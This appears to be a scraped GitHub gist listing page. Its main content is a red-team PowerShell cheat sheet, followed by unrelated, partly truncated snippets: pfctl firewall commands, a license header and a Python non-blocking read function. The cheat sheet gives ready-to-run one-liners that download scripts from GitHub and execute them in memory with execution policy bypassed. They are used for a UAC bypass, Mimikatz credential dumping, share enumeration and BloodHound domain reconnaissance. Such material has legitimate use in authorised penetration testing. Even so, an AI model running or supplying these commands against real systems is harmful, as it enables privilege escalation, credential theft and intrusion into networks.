Skip to content

Instantly share code, notes, and snippets.

# Description:
# Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.
# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"
# Invoke-Mimikatz: Dump credentials from memory
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"
# Import Mimikatz Module to run further commands
@m8sec
m8sec / RedTeam_CheatSheet.ps1
Last active May 21, 2024 08:42
Red Team CheatSheet
# Domain Recon
## ShareFinder - Look for shares on network and check access under current user context & Log to file
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-ShareFinder -CheckShareAccess|Out-File -FilePath sharefinder.txt"
## Import PowerView Module
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1')"
## Invoke-BloodHound for domain recon
powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1');Invoke-BloodHound"
@johnbianchi
johnbianchi / pfctl-cheatsheet.txt
Last active June 8, 2024 02:17
pfctl cheat sheet
#### General PFCTL Commands ####
$ pfctl -d disable # packet-filtering
$ pfctl -e enable # packet-filtering
$ pfctl -q # run quiet
$ pfctl -v -v # run even more verbose
#### Loading PF Rules ####
$ pfctl -f /etc/pf.conf # load /etc/pf.conf
$ pfctl -n -f /etc/pf.conf # parse /etc/pf.conf, but dont load it
$ pfctl -R -f /etc/pf.conf # load only the FILTER rules
$ pfctl -N -f /etc/pf.conf # load only the NAT rules
@andrequeiroz
andrequeiroz / holtwinters.py
Last active July 5, 2023 07:50
Implementation of Holt-Winters algorithms in Python 2
#The MIT License (MIT)
#
#Copyright (c) 2015 Andre Queiroz
#
#Permission is hereby granted, free of charge, to any person obtaining a copy
#of this software and associated documentation files (the "Software"), to deal
#in the Software without restriction, including without limitation the rights
#to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
#copies of the Software, and to permit persons to whom the Software is
#furnished to do so, subject to the following conditions:
@sebclaeys
sebclaeys / non_blocking_read.py
Created September 21, 2011 13:56
Python non-blocking read with subprocess.Popen
import fcntl
import os
from subprocess import *
def non_block_read(output):
fd = output.fileno()
fl = fcntl.fcntl(fd, fcntl.F_GETFL)
fcntl.fcntl(fd, fcntl.F_SETFL, fl | os.O_NONBLOCK)
try:
return output.read()